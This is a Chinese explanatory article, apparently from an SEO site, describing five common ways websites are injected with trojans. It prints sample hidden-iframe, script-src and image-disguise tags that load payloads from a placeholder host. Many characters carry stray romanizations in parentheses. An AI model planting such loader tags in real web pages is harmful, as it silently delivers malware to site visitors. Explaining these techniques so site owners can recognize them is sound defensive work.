前段時(shí)間公司優(yōu)化項(xiàng)目中出現(xiàn)了幾個(gè)網(wǎng)站被掛馬的情況,所以SEO研究院就針對(duì)于掛馬進(jìn)行了研究,網(wǎng)站掛馬常見的幾種代碼類型如下:
1、框架嵌入式網(wǎng)頁掛馬
框架嵌入式網(wǎng)頁掛馬是最早也是早有效的一種網(wǎng)絡(luò)掛馬技術(shù),它是掛馬者利用iframe語句,加載到任意網(wǎng)頁中都可執(zhí)行的掛馬形式。通常的代碼形式如下:
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>
在打開插入該句代碼的網(wǎng)頁后,同時(shí)也就打開了http://www.xxx.com/muma.html這個(gè)頁面,但是由于這個(gè)頁面的長(zhǎng)和寬都是“0”,所以很難被察覺到,極其隱蔽。
2、JS調(diào)用型網(wǎng)頁掛馬
JS調(diào)用型網(wǎng)頁掛馬是利用JS腳本文件調(diào)用的原理進(jìn)行的網(wǎng)頁木馬隱蔽掛馬技術(shù),例如黑客制作了一個(gè).JS的文件,然后就利用這個(gè)JS代碼調(diào)用掛馬的網(wǎng)頁。通常的代碼形式如下:
<script language=javascript src=http://www.xxx.com/gm.js></script>
http://www.xxx.com/gm.js這就是JS的腳本文件,通過它可以調(diào)用和執(zhí)行木馬的服務(wù)端。這些JS文件一般都是可以通過工具生成的,黑客只需要輸入相關(guān)的選項(xiàng)就可以了。
3、圖片偽裝掛馬
黑客們?yōu)榱颂颖軞⒍颈O(jiān)視就生產(chǎn)了一種新的技術(shù)――圖片木馬,如下面的這段代碼
<html>
<iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe>
<img src="http://www.xxx.com/test.jpg">
</html>
攻擊者將http://www.xxx.com/test.htm中的木馬代碼植入到了test.jpg圖片文件中,這些嵌入代碼的圖片也都可以使用工具生成,黑客們只需要輸入相關(guān)的選項(xiàng)就可以了。
4、網(wǎng)絡(luò)釣魚掛馬
網(wǎng)絡(luò)釣魚掛馬又稱偽裝調(diào)用掛馬,是互聯(lián)網(wǎng)中最常見的一種欺騙手段。它是黑客利用人們的好奇心、貪心等心理制作的一個(gè)偽裝鏈接或網(wǎng)頁。它利用社會(huì)工程學(xué)的欺騙方法,引誘用戶點(diǎn)擊,當(dāng)用戶打開一個(gè)看似正常的頁面時(shí),網(wǎng)頁代碼隨之運(yùn)行。
這種方式的隱蔽性極高,它往往是欺騙用戶輸入某些個(gè)人隱私信息,竊取個(gè)人隱私。如下圖就是一個(gè)網(wǎng)絡(luò)釣魚網(wǎng)站,表面看起來沒有異常,但是你看域名就會(huì)發(fā)現(xiàn)問題了。

5、偽裝掛馬
這是一種高級(jí)的欺騙掛馬,是黑客利用IE或者是Fixfox瀏覽器的設(shè)計(jì)缺陷制造的一種高級(jí)欺騙技術(shù),當(dāng)用戶訪問木馬頁面時(shí)地址欄的是www.sina.com等用戶信任的地址,但是其實(shí)打開了被掛馬的頁面,從而實(shí)現(xiàn)欺騙。
新聞熱點(diǎn)
疑難解答
圖片精選